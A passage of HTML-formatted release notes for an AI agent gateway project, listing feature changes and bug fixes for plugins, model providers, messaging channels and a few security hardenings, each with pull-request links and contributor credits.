<li>Plugins/tests: reuse plugin loader alias and Jiti config resolution across repeated same-context loads, reducing import-heavy test overhead. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295386124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69316" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69316/hovercard" href="https://github.com/openclaw/openclaw/pull/69316">#69316</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</li>
<li>Cron: split runtime execution state into <code>jobs-state.json</code> so <code>jobs.json</code> stays stable for git-tracked job definitions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4223895311" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63105" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63105/hovercard" href="https://github.com/openclaw/openclaw/pull/63105">#63105</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Feelw00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Feelw00">@Feelw00</a>.</li>
<li>Agents/compaction: send opt-in start and completion notices during context compaction. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4278631167" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67830" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67830/hovercard" href="https://github.com/openclaw/openclaw/pull/67830">#67830</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/feniix/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/feniix">@feniix</a>.</li>
<li>Moonshot/Kimi: default bundled Moonshot setup, web search, and media-understanding surfaces to <code>kimi-k2.6</code> while keeping <code>kimi-k2.5</code> available for compatibility. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298970170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69477" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69477/hovercard" href="https://github.com/openclaw/openclaw/pull/69477">#69477</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/scoootscooob/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/scoootscooob">@scoootscooob</a>.</li>
<li>Moonshot/Kimi: allow <code>thinking.keep = "all"</code> on <code>moonshot/kimi-k2.6</code>, and strip it for other Moonshot models or requests where pinned <code>tool_choice</code> disables thinking. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289905771" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68816" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68816/hovercard" href="https://github.com/openclaw/openclaw/pull/68816">#68816</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aniaan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aniaan">@aniaan</a>.</li>
<li>BlueBubbles/groups: forward per-group <code>systemPrompt</code> config into inbound context <code>GroupSystemPrompt</code> so configured group-specific behavioral instructions (for example threaded-reply and tapback conventions) are injected on every turn. Supports <code>"*"</code> wildcard fallback matching the existing <code>requireMention</code> pattern. Closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203322859" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60665" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60665/hovercard" href="https://github.com/openclaw/openclaw/issues/60665">#60665</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293153243" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69198" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69198/hovercard" href="https://github.com/openclaw/openclaw/pull/69198">#69198</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
<li>Plugins/tasks: add a detached runtime registration contract so plugin executors can own detached task lifecycle and cancellation without reaching into core task internals. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290560041" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68915" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68915/hovercard" href="https://github.com/openclaw/openclaw/pull/68915">#68915</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mbelinky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mbelinky">@mbelinky</a>.</li>
<li>Terminal/logging: optimize <code>sanitizeForLog()</code> by replacing the iterative control-character stripping loop with a single regex pass while preserving the existing ANSI-first sanitization behavior. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4269298617" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67205" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67205/hovercard" href="https://github.com/openclaw/openclaw/pull/67205">#67205</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bulutmuf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bulutmuf">@bulutmuf</a>.</li>
<li>QA/CI: make <code>openclaw qa suite</code> and <code>openclaw qa telegram</code> fail by default when scenarios fail, add <code>--allow-failures</code> for artifact-only runs, and tighten live-lane defaults for CI automation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292375229" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69122" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69122/hovercard" href="https://github.com/openclaw/openclaw/pull/69122">#69122</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Mattermost: stream thinking, tool activity, and partial reply text into a single draft preview post that finalizes in place when safe. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079961255" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47838" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47838/hovercard" href="https://github.com/openclaw/openclaw/pull/47838">#47838</a>) thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ninjaa/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ninjaa">@ninjaa</a>.</li>
</ul>
<h3>Fixes</h3>
<ul>
<li>Exec/YOLO: stop rejecting gateway-host exec in <code>security=full</code> plus <code>ask=off</code> mode via the Python/Node script preflight hardening path, so promptless YOLO exec once again runs direct interpreter stdin and heredoc forms such as <code>node &lt;&lt;'NODE' ... NODE</code>.</li>
<li>OpenAI Codex: normalize legacy <code>openai-completions</code> transport overrides on default OpenAI/Codex and GitHub Copilot-compatible hosts back to the native Codex Responses transport while leaving custom proxies untouched. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072230033" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45304" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/45304/hovercard" href="https://github.com/openclaw/openclaw/pull/45304">#45304</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4051911911" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42194" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/42194/hovercard" href="https://github.com/openclaw/openclaw/pull/42194">#42194</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dyss1992/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dyss1992">@dyss1992</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DeadlySilent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DeadlySilent">@DeadlySilent</a>.</li>
<li>Anthropic/plugins: scope Anthropic <code>api: "anthropic-messages"</code> defaulting to Anthropic-owned providers, so <code>openai-codex</code> and other providers without an explicit <code>api</code> no longer get rewritten to the wrong transport. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242180427" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64534" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64534/hovercard" href="https://github.com/openclaw/openclaw/issues/64534">#64534</a>.</li>
<li>fix(qqbot): add SSRF guard to direct-upload URL paths in uploadC2CMedia and uploadGroupMedia [AI-assisted]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300293964" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69595" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69595/hovercard" href="https://github.com/openclaw/openclaw/pull/69595">#69595</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>fix(gateway): enforce allowRequestSessionKey gate on template-rendered mapping sessionKeys. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296975595" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69381" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69381/hovercard" href="https://github.com/openclaw/openclaw/pull/69381">#69381</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Browser/Chrome MCP: surface <code>DevToolsActivePort</code> attach failures as browser-connectivity errors instead of a generic "waiting for tabs" timeout, and point signed-out fallbacks toward the managed <code>openclaw</code> profile.</li>
<li>Webchat/images: treat inline image attachments as media for empty-turn gating while still ignoring metadata-only blank turns. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298879679" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69474" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69474/hovercard" href="https://github.com/openclaw/openclaw/pull/69474">#69474</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jaswir/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jaswir">@Jaswir</a>.</li>
<li>Discord/think: only show <code>adaptive</code> in <code>/think</code> autocomplete for provider/model pairs that actually support provider-managed adaptive thinking, so GPT/OpenAI models no longer advertise an Anthropic-only option.</li>
<li>Thinking: only expose <code>max</code> for models that explicitly support provider max reasoning, and remap stored <code>max</code> settings to the largest supported thinking mode when users switch to another model.</li>
<li>Gateway/usage: bound the cost usage cache with FIFO eviction so date/range lookups cannot grow unbounded. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290122995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68842" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68842/hovercard" href="https://github.com/openclaw/openclaw/pull/68842">#68842</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Feelw00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Feelw00">@Feelw00</a>.</li>
<li>OpenAI/Responses: resolve <code>/think</code> levels against each GPT model's supported reasoning efforts so <code>/think off</code> no longer becomes high reasoning or sends unsupported <code>reasoning.effort: "none"</code> payloads.</li>
<li>Lobster/TaskFlow: allow managed approval resumes to use <code>approvalId</code> without a resume token, and persist that id in approval wait state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300014752" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69559" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69559/hovercard" href="https://github.com/openclaw/openclaw/pull/69559">#69559</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kirkluokun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kirkluokun">@kirkluokun</a>.</li>
<li>Plugins/startup: install bundled runtime dependencies into each plugin's own runtime directory, reuse source-checkout repair caches after rebuilds, and log only packages that were actually installed so repeated Gateway starts stay quiet once deps are present.</li>
<li>Plugins/startup: ignore pnpm's <code>npm_execpath</code> when repairing bundled plugin runtime dependencies and skip workspace-only package specs so npm-only install flags or local workspace links do not break packaged plugin startup.</li>
<li>MCP: block interpreter-startup env keys such as <code>NODE_OPTIONS</code> for stdio servers while preserving ordinary credential and proxy env vars. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299858919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69540" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69540/hovercard" href="https://github.com/openclaw/openclaw/pull/69540">#69540</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/drobison00/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/drobison00">@drobison00</a>.</li>
<li>Agents/shell: ignore non-interactive placeholder shells like <code>/usr/bin/false</code> and <code>/sbin/nologin</code>, falling back to <code>sh</code> so service-user exec runs no longer exit immediately. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295241548" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69308" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69308/hovercard" href="https://github.com/openclaw/openclaw/pull/69308">#69308</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sk7n4k3d/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sk7n4k3d">@sk7n4k3d</a>.</li>
<li>Setup/TUI: relaunch the setup hatch TUI in a fresh process while preserving the configured gateway target and auth source, so onboarding recovers terminal state cleanly without exposing gateway secrets on command-line args. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299687411" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69524" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69524/hovercard" href="https://github.com/openclaw/openclaw/pull/69524">#69524</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Codex: avoid re-exposing the image-generation tool on native vision turns with inbound images, and keep bare image-model overrides on the configured image provider. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4246074486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65061" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65061/hovercard" href="https://github.com/openclaw/openclaw/pull/65061">#65061</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhulijin1991/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhulijin1991">@zhulijin1991</a>.</li>
<li>Sessions/reset: clear auto-sourced model, provider, and auth-profile overrides on <code>/new</code> and <code>/reset</code> while preserving explicit user selections, so channel sessions stop staying pinned to runtime fallback choices. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297673043" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69419" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69419/hovercard" href="https://github.com/openclaw/openclaw/pull/69419">#69419</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sk7n4k3d/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sk7n4k3d">@sk7n4k3d</a>.</li>
<li>Sessions/costs: snapshot <code>estimatedCostUsd</code> like token counters so repeated persist paths no longer compound the same run cost by up to dozens of times. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297467955" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69403" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69403/hovercard" href="https://github.com/openclaw/openclaw/pull/69403">#69403</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MrMiaigi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MrMiaigi">@MrMiaigi</a>.</li>
<li>OpenAI Codex: route ChatGPT/Codex OAuth Responses requests through the <code>/backend-api/codex</code> endpoint so <code>openai-codex/gpt-5.4</code> no longer hits the removed <code>/backend-api/responses</code> alias. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295870982" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69336" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69336/hovercard" href="https://github.com/openclaw/openclaw/pull/69336">#69336</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mzogithub/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mzogithub">@mzogithub</a>.</li>
<li>OpenAI/Responses: omit disabled reasoning payloads when <code>/think off</code> is active, so GPT reasoning models no longer receive unsupported <code>reasoning.effort: "none"</code> requests. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212610595" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61982" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61982/hovercard" href="https://github.com/openclaw/openclaw/pull/61982">#61982</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/a-tokyo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/a-tokyo">@a-tokyo</a>.</li>
<li>Gateway/pairing: treat loopback shared-secret node-host, TUI, and gateway clients as local for pairing decisions, so trusted local tools no longer reconnect as remote clients and fail with <code>pairing required</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297898125" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69431/hovercard" href="https://github.com/openclaw/openclaw/pull/69431">#69431</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SARAMALI15792/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SARAMALI15792">@SARAMALI15792</a>.</li>
<li>Active Memory: degrade gracefully when memory recall fails during prompt building, logging a warning and letting the reply continue without memory context instead of failing the whole turn. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4299181298" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69485" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69485/hovercard" href="https://github.com/openclaw/openclaw/pull/69485">#69485</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Magicray1217/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Magicray1217">@Magicray1217</a>.</li>
<li>Ollama: add provider-policy defaults for <code>baseUrl</code> and <code>models</code> so implicit local discovery can run before config validation rejects a minimal Ollama provider config. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296784483" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69370" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69370/hovercard" href="https://github.com/openclaw/openclaw/pull/69370">#69370</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PratikRai0101/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PratikRai0101">@PratikRai0101</a>.</li>
<li>Agents/model selection: clear transient auto-failover session overrides before each turn so recovered primary models are retried immediately without emitting user-override reset warnings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296542538" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69365" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69365/hovercard" href="https://github.com/openclaw/openclaw/pull/69365">#69365</a>) Thanks @hitesh-github99.</li>
<li>Auto-reply: apply silent <code>NO_REPLY</code> policy per conversation type, so direct chats get a helpful rewritten reply while groups and internal deliveries can remain quiet. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288588954" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68644" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68644/hovercard" href="https://github.com/openclaw/openclaw/pull/68644">#68644</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Takhoffman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Takhoffman">@Takhoffman</a>.</li>
<li>Telegram/status reactions: honor <code>messages.removeAckAfterReply</code> when lifecycle status reactions are enabled, clearing or restoring the reaction after success/error using the configured hold timings. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4281815006" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68067" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68067/hovercard" href="https://github.com/openclaw/openclaw/pull/68067">#68067</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/poiskgit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/poiskgit">@poiskgit</a>.</li>
<li>Web search/plugins: resolve plugin-scoped SecretRef API keys for bundled Exa, Firecrawl, Gemini, Kimi, Perplexity, Tavily, and Grok web-search providers when they are selected through the shared web-search config. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286936148" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68424" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68424/hovercard" href="https://github.com/openclaw/openclaw/pull/68424">#68424</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/afurm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/afurm">@afurm</a>.</li>
<li>Telegram/polling: raise the default polling watchdog threshold from 90s to 120s and add configurable <code>channels.telegram.pollingStallThresholdMs</code> (also per-account) so long-running Telegram work gets more room before polling is treated as stalled. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4171105612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57737" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57737/hovercard" href="https://github.com/openclaw/openclaw/pull/57737">#57737</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Vitalcheffe/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Vitalcheffe">@Vitalcheffe</a>.</li>
<li>Telegram/polling: bound the persisted-offset confirmation <code>getUpdates</code> probe with a client-side timeout so a zombie socket cannot hang polling recovery before the runner watchdog starts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4100697326" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50368" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50368/hovercard" href="https://github.com/openclaw/openclaw/pull/50368">#50368</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/boticlaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/boticlaw">@boticlaw</a>.</li>
<li>Agents/Pi runner: retry silent <code>stopReason=error</code> turns with no output when no side effects ran, so non-frontier providers that briefly return empty error turns get another chance instead of ending the session early. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285719244" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68310" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68310/hovercard" href="https://github.com/openclaw/openclaw/pull/68310">#68310</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Chased1k/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Chased1k">@Chased1k</a>.</li>
<li>Plugins/memory: preserve the active memory capability when read-only snapshot plugin loads run, so status and provider discovery paths no longer wipe memory public artifacts. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293432275" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69219" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69219/hovercard" href="https://github.com/openclaw/openclaw/pull/69219">#69219</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeroaltitude/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeroaltitude">@zeroaltitude</a>.</li>
<li>Plugins: keep only the highest-precedence manifest when distinct discovered plugins share an id, so lower-precedence global or workspace duplicates no longer load beside bundled or config-selected plugins. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048942451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41626" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/41626/hovercard" href="https://github.com/openclaw/openclaw/pull/41626">#41626</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tortes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tortes">@Tortes</a>.</li>
<li>fix(security): block MINIMAX_API_HOST workspace env injection and remove env-driven URL routing [AI-assisted]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4270399571" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67300" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67300/hovercard" href="https://github.com/openclaw/openclaw/pull/67300">#67300</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</li>
<li>Cron/delivery: treat explicit <code>delivery.mode: "none"</code> runs as not requested even if the runner reports <code>delivered: false</code>, so no-delivery cron jobs no longer persist false delivery failures or errors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4294708685" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69285" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69285/hovercard" href="https://github.com/openclaw/openclaw/pull/69285">#69285</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matsuri1987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matsuri1987">@matsuri1987</a>.</li>
<li>Plugins/install: repair active and default-enabled bundled plugin runtime dependencies before import in packaged installs, so bundled Discord, WhatsApp, Slack, Telegram, and provider plugins work without putting their dependency trees in core.</li>
<li>BlueBubbles: raise the outbound <code>/api/v1/message/text</code> send timeout default from 10s to 30s, and add a configurable <code>channels.bluebubbles.sendTimeoutMs</code> (also per-account) so macOS 26 setups where Private API iMessage sends stall for 60+ seconds no longer silently lose messages at the 10s abort. Probes, chat lookups, and health checks keep the shorter 10s default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4272911942" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67486" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67486/hovercard" href="https://github.com/openclaw/openclaw/issues/67486">#67486</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293104018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69193" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69193/hovercard" href="https://github.com/openclaw/openclaw/pull/69193">#69193</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/omarshahine/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/omarshahine">@omarshahine</a>.</li>
<li>Agents/bootstrap: budget truncation markers against per-file caps, preserve source content instead of silently wasting bootstrap bytes, and avoid marker-only output in tiny-budget truncation cases. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292276705" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69114" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69114/hovercard" href="https://github.com/openclaw/openclaw/pull/69114">#69114</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BKF-Gitty/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BKF-Gitty">@BKF-Gitty</a>.</li>
